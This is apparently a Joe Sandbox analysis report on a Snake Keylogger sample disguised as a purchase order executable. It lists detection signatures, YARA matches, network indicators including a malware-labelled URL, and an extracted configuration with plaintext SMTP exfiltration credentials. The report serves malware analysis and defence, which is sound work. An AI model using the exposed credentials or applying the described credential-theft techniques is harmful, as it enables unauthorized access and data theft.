Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
109__Purchase_Order.exe

Overview

General Information

Sample name:109__Purchase_Order.exe
Analysis ID:1419816
MD5:4a14a9dedd4dfe259949539090ccc9fe
SHA1:31d7fe0d77ef9b7d3df2f1a2865c3823b116991e
SHA256:9fc2770fbd67c9b6f9f244ac6ac0fa8810c3d50e08c7d77b332bf1447ab77fab
Tags:exeHUNSnakeKeylogger
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 109__Purchase_Order.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\109__Purchase_Order.exe" MD5: 4A14A9DEDD4DFE259949539090CCC9FE)
    • 109__Purchase_Order.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\109__Purchase_Order.exe" MD5: 4A14A9DEDD4DFE259949539090CCC9FE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x14782:$a1: get_encryptedPassword
      • 0x14a78:$a2: get_encryptedUsername
      • 0x1458e:$a3: get_timePasswordChanged
      • 0x14689:$a4: get_passwordField
      • 0x14798:$a5: set_encryptedPassword
      • 0x15d9b:$a7: get_logins
      • 0x15cfe:$a10: KeyLoggerEventArgs
      • 0x15997:$a11: KeyLoggerEventArgsEventHandler
      00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x180c0:$x1: $%SMTPDV$
      • 0x18124:$x2: $#TheHashHere%&
      • 0x1975f:$x3: %FTPDV$
      • 0x19853:$x4: $%TelegramDv$
      • 0x15997:$x5: KeyLoggerEventArgs
      • 0x15cfe:$x5: KeyLoggerEventArgs
      • 0x19783:$m2: Clipboard Logs ID
      • 0x1994f:$m2: Screenshot Logs ID
      • 0x19a1b:$m2: keystroke Logs ID
      • 0x19927:$m4: \SnakeKeylogger\
      00000002.00000002.4075654635.0000000003334000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        Click to see the 14 entries
        SourceRuleDescriptionAuthorStrings
        0.2.109__Purchase_Order.exe.442b100.9.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0.2.109__Purchase_Order.exe.442b100.9.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            0.2.109__Purchase_Order.exe.442b100.9.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x12b82:$a1: get_encryptedPassword
            • 0x12e78:$a2: get_encryptedUsername
            • 0x1298e:$a3: get_timePasswordChanged
            • 0x12a89:$a4: get_passwordField
            • 0x12b98:$a5: set_encryptedPassword
            • 0x1419b:$a7: get_logins
            • 0x140fe:$a10: KeyLoggerEventArgs
            • 0x13d97:$a11: KeyLoggerEventArgsEventHandler
            0.2.109__Purchase_Order.exe.442b100.9.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x1a49b:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x196cd:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x19b00:$a4: \Orbitum\User Data\Default\Login Data
            • 0x1ab3f:$a5: \Kometa\User Data\Default\Login Data
            0.2.109__Purchase_Order.exe.442b100.9.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x1372d:$s1: UnHook
            • 0x13734:$s2: SetHook
            • 0x1373c:$s3: CallNextHook
            • 0x13749:$s4: _hook
            Click to see the 26 entries

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.199.225, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\109__Purchase_Order.exe, Initiated: true, ProcessId: 7532, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49757
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://scratchdreams.tk/_send_.php?TSAvira URL Cloud: Label: malware
            Source: https://scratchdreams.tkAvira URL Cloud: Label: malware
            Source: http://scratchdreams.tkAvira URL Cloud: Label: malware
            Source: 00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}
            Source: 109__Purchase_Order.exeReversingLabs: Detection: 39%
            Source: 109__Purchase_Order.exeJoe Sandbox ML: detected
            Source: 109__Purchase_Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49736 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49750 version: TLS 1.2
            Source: 109__Purchase_Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: ENYy.pdb source: 109__Purchase_Order.exe
            Source: Binary string: ENYy.pdbSHA256y1 source: 109__Purchase_Order.exe
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 4x nop then jmp 02F0FCD1h2_2_02F0FA10
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 4x nop then jmp 02F0EFDDh2_2_02F0EDF0
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 4x nop then jmp 02F0F967h2_2_02F0EDF0
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_02F0E310
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_02F0EB23
            Source: C:\Users\user\Desktop\109__Purchase_Order.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_02F0E943

            Networking

            barindex
            Source: Yara matchFile source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPE
            Source: global trafficTCP traffic: 192.168.2.4:49757 -> 208.91.199.225:587
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewIP Address: 208.91.199.225 208.91.199.225
            Source: Joe Sandbox ViewIP Address: 172.67.177.134 172.67.177.134
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: global trafficTCP traffic: 192.168.2.4:49757 -> 208.91.199.225:587
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49736 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
            Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003243000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003234000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003207000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000314B000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003215000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003243000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003234000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003207000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000314B000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000318E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: 109__Purchase_Order.exe, 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003243000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003234000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003163000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003207000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scratchdreams.tk
            Source: 109__Purchase_Order.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
            Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003334000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: 109__Purchase_Order.exe, 00000000.00000002.1692997195.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003243000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003234000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003207000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000314B000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000318E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: 109__Purchase_Order.exe, 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000314B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231
            Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003243000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003234000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003207000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000318E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231$
            Source: 109__Purchase_Order.exe, 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003251000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk
            Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk/_send_.php?TS
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49750 version: TLS 1.2

            System Summary

            barindex
            Source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
